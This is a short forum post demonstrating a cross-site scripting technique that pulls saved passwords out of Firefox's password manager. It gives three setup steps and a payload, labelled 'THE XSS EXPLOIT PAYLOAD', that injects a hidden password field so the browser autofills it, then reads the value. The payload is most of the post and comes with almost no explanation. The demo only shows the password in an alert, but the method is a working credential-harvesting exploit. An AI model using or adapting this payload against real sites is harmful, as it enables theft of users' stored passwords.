Jump to content
begood

XSS demo for stealing passwords from the Firefox password manager

Recommended Posts

Posted

Similar technique may work for Internet Explorer, Safari, Chrome, Opera, etc. Your mileage may vary.

1. Save a username / password in Firefox's password manager by filling out the form below with fake data.

2. Clicking "Remember" when asked.

3. Then click back.

THE XSS EXPLOIT PAYLOAD 

<script>
document.write('<form><input id=p type=password style=visibility:hidden></form>');
setTimeout('alert("Password: " + document.getElementById("p").value)', 100);
</script>

look here :

XSS demo for stealing passwords from the Firefox Password Manager

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...